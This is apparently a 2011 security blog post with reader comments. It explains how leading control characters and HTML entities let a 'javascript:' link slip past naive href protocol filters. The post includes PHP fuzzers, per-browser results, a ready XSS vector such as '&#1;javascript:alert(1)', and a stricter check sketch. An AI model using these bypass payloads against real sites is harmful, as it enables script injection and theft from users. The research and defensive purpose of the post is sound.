Update: You can find a good fuzzer here (by Gareth Heyes), which inspects the location.protocol value. I realized that html_entity_decode is not entirely suitable for this task; take a look at the comments for further useful information.

Let's consider an XSS filter that tries to sanitize HTML code. It allows links like the following to be inserted:

<a href="http://www.x.x">click me</a>

It uses a regex to check the protocol (http, https and ftp are allowed), but this check is not very smart, so we can bypass it by using HTML entities. It should allow us to inject the following vector:

<a href=" javascript:alert(0)">click me</a>

By using an initial whitespace the filter becomes confused and allows it!
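
To make the idea concrete, here is a minimal sketch of how such a filter might be fooled. The function name naive_href_allowed and its regex are my own assumptions for illustration, not the code of any real filter: it only recognises a scheme when the value starts with one, and lets everything else through as a relative URL.

```php
<?php
// Hypothetical naive filter (an assumption, not taken from a real product).
// It looks for "scheme:" only at the very start of the attribute value.
function naive_href_allowed($href) {
    if (preg_match('/^([a-z][a-z0-9+.-]*):/i', $href, $m)) {
        // A scheme was found: allow it only if it is on the whitelist
        return in_array(strtolower($m[1]), array('http', 'https', 'ftp'), true);
    }
    // No scheme found at the start: assumed to be a relative URL, let through
    return true;
}

var_dump(naive_href_allowed('http://www.x.x'));       // allowed
var_dump(naive_href_allowed('javascript:alert(0)'));  // blocked
var_dump(naive_href_allowed(' javascript:alert(0)')); // allowed: the leading space hides the scheme
```
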
I'd like to know which characters I can use in that position to bypass similar stupid filters that do not allow whitespace. So let's fuzz with some simple PHP code:

HTML Entities
for ($i = 0; $i <= 65535; $i++) {
    // Decode the decimal entity into the raw character and place it before the scheme
    $r = html_entity_decode('&#'.$i.';', ENT_QUOTES, 'UTF-8');
    echo '<a href="'.$r.'javascript:alert(0)">click me</a> - '.$r.' - '.$i.' <br />';
}

Firefox 3.6.13 : &#8; &#9; &#10; &#13; &#32;
Opera 11.00 : from &#9; to &#13; and &#32;
Chrome 8.0.552.237 : from &#1; to &#32;
IE 8 : from &#0; to &#32;

So the following vector could be used by an attacker, hoping that the unlucky user uses either Chrome or IE.

<a href="&#1;javascript:alert(1)">sad</a>

Let's try with hex encoding:
Hex encoding
for ($i = 0; $i <= 65535; $i++) {
    // Build the hexadecimal entity, e.g. &#x20; for 32
    $h = '&#x'.dechex($i).';';
    echo '<a href="'.$h.'javascript:alert(0)">click me</a> - '.$h.' - '.$i.' <br />';
}

Firefox 3.6.13 : &#x8; &#x9; &#xa; &#xd; &#x20;
Opera 11.00 : from &#x9; to &#xd; and &#x20;
Chrome 8.0.552.237 : from &#x1; to &#x20;
IE 8 : from &#x1; to &#x20;
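
Since every character found above sits in the range 0 to 32, a filter that searches for a forbidden scheme, or only recognises a scheme at the very start of the value, is easy to fool. One possible way out, sketched below under the assumption that relative URLs may be rejected too, is to accept a value only when it literally starts with an allowed scheme. The name strict_href_allowed is hypothetical, and this covers only the protocol check, not attribute escaping.

```php
<?php
// Hypothetical stricter check (an assumption, not a complete sanitizer):
// the raw value must begin with http://, https:// or ftp://.
// Anything else, including relative URLs and entity-prefixed values, is rejected.
function strict_href_allowed($href) {
    return preg_match('#^(?:https?|ftp)://#i', $href) === 1;
}

var_dump(strict_href_allowed('http://www.x.x'));           // allowed
var_dump(strict_href_allowed(' javascript:alert(0)'));     // rejected
var_dump(strict_href_allowed('&#1;javascript:alert(1)'));  // rejected
```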

Note that the filter must not convert & into &amp; for this to work.
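
A quick sketch of why that matters, using PHP's htmlspecialchars as a stand-in for whatever escaping the filter applies (an assumption on my side): once the ampersand is escaped, the browser no longer sees a character reference but the literal text, so the value should be treated as a relative URL instead of a javascript: one.

```php
<?php
// The vector from above, passed through htmlspecialchars as an example of
// a filter that escapes the ampersand (assumed behaviour, not a real filter).
$vector  = '&#1;javascript:alert(1)';
$escaped = htmlspecialchars($vector, ENT_QUOTES, 'UTF-8');

echo '<a href="'.$escaped.'">sad</a>';
// The href now starts with &amp;#1; so the entity is never decoded to U+0001
```
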
Do you think this kind of filter doesn't exist? I am sure you've already come across something similar :P

4 Responses to Bypassing a protocol check (HREF attribute)

  1. 230 Gareth Heyes 2011-01-26 8:45 am

    Yeah, I wrote a fuzzer to do this by inspecting the location.protocol value:-


    Notice that in your fuzzer you're only going up to 50000 when you can go to 0xFFFF or above. Generating chars by decoding HTML entities is also flawed because you're trusting that function instead of generating the characters manually. Charset is also important. The function below generates a Unicode char above what chr allows.

    function unichr($c) {
        // Encode code point $c as UTF-8; continuation bytes follow the standard UTF-8 layout
        if ($c <= 0x7F) {
            return chr($c);
        } else if ($c <= 0x7FF) {
            return chr(0xC0 | $c >> 6) . chr(0x80 | $c & 0x3F);
        } else if ($c <= 0xFFFF) {
            return chr(0xE0 | $c >> 12) . chr(0x80 | $c >> 6 & 0x3F) . chr(0x80 | $c & 0x3F);
        } else if ($c <= 0x10FFFF) {
            return chr(0xF0 | $c >> 18) . chr(0x80 | $c >> 12 & 0x3F) . chr(0x80 | $c >> 6 & 0x3F) . chr(0x80 | $c & 0x3F);
        } else {
            return false;
        }
    }

  2. 231 sneak 2011-01-26 8:57 am

    Hi Gareth, your fuzzer is really cool! :)

    Yeah, I have to go up to 65535, but I do not think I will find useful characters. However, I'm going to test it and update the blog post.

    You're right about html_entity_decode, thank you for the advice and for the unichr function. :)
    Oh damn, the parser has modified your function, could you post it somewhere else (e.g. pastebin)?

  3. 233 Gareth Heyes 2011-01-26 1:43 pm

    Actually 0xFEFF is interesting because it's the zero-width no-break space (BOM) character, and on Firefox you used to be able to inject that in the middle of the URL :)


    Keep them posts coming :D

  4. 234 sneak 2011-01-26 6:51 pm

    Ok, thank you! I'm going to run some more tests... :)
